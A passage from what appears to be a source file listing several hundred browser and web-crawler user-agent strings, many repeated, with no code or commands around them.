'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0',
'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g',
'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125',
'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)',
'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)',
'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0',
'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10',
'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)',
'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',
'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16',
'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)',
'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7',
'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0',
'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)',
'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)',
'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10',
'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)',
'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007',
'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)',
'Googlebot/2.1 (http://www.googlebot.com/bot.html)', 'Opera/9.20 (Windows NT 6.0; U; en)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061205 Iceweasel/2.0.0.1 (Debian-2.0.0.1+dfsg-2)',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)',
'Opera/10.00 (X11; Linux i686; U; en) Presto/2.2.0',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16',
'Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101209 Firefox/3.6.13',
'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)',
'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',
'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)', 'Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7',
'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',
'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)',
'YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)',
'Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.27; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.21; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; GTB7.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57',
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0',
'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g',
'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125',
'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)',
'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)',
'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0',
'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10',
'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)',
'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',
'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16',
'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)',
'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7',
'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0',
'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)',
'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)',
'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10',
'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)',
'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007',
'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57',
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0',
'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g',
'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125',
'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)',
'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)',
'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0',
'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10',
'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)',
'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',
'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16',
'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)',
'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7',
'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0',
'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)',
'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)',
'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10',
'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)',
'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007',
'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179',
'Mozilla/5.0 (compatible; 008/0.83; http://www.80legs.com/webcrawler.html) Gecko/2008032620',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) AddSugarSpiderBot www.idealobserver.com',
'Mozilla/5.0 (compatible; AnyApexBot/1.0; +http://www.anyapex.com/bot.html)',
'Mozilla/4.0 (compatible; Arachmo)', 'Mozilla/4.0 (compatible; B-l-i-t-z-B-O-T)',
'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)',
'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)',
'Mozilla/5.0 (compatible; BecomeBot/2.3; MSIE 6.0 compatible; +http://www.become.com/site_owners.html)',
'BillyBobBot/1.0 (+http://www.billybobbot.com/crawler/)',
'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)',
'Sqworm/2.9.85-BETA (beta_release; 20011115-775; i686-pc-linux-gnu)',
'Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)',
'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)',
'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )',
'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )',
'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker ([email protected]; http://www.WISEnutbot.com)',
'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker ([email protected]; http://www.WISEnutbot.com)',
'Mozilla/4.0 compatible ZyBorg/1.0 ([email protected]; http://www.WISEnutbot.com)',
'Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)',
'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser 1.98.744; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; Acoo Browser; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Avant Browser)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.1; .NET CLR 3.5.30729; .NET CLR 3.0.30618)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Acoo Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko, Safari/419.3) Cheshire/1.0.ALPHA',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) ChromePlus/4.0.222.3 Chrome/4.0.222.3 Safari/532.2',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 ChromePlus/1.5.1.1',
'Links (2.7; Linux 3.7.9-2-ARCH x86_64; GNU C 4.7.1; text)',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A',
'Mozilla/5.0 (PLAYSTATION 3; 3.55)', 'Mozilla/5.0 (PLAYSTATION 3; 2.00)',
'Mozilla/5.0 (PLAYSTATION 3; 1.00)',
'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:24.0) Gecko/20100101 Thunderbird/24.4.0',
'Mozilla/5.0 (compatible; AbiLogicBot/1.0; +http://www.abilogic.com/bot.html)',
'SiteBar/3.3.8 (Bookmark Server; http://sitebar.org/)',
'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)',
'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)',
'Mozilla/4.0 (compatible; WebCapture 3.0; Macintosh)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (FM Scene 4.6.1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729) (Prevx 3.0.5) ',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.8) Gecko/20071004 Iceweasel/2.0.0.8 (Debian-2.0.0.6+2.0.0.8-Oetch1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {1C69E7AA-C14E-200E-5A77-8EAB2D667A07})',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; acc=baadshah; acc=none; freenet DSL 1.1; (none))',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.51',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; snprtz|S26320700000083|2600#Service Pack 1#2#5#154321|isdn)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Alexa Toolbar; mxie; .NET CLR 1.1.4322)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; ja-jp) AppleWebKit/417.9 (KHTML, like Gecko) Safari/417.8',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57',
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
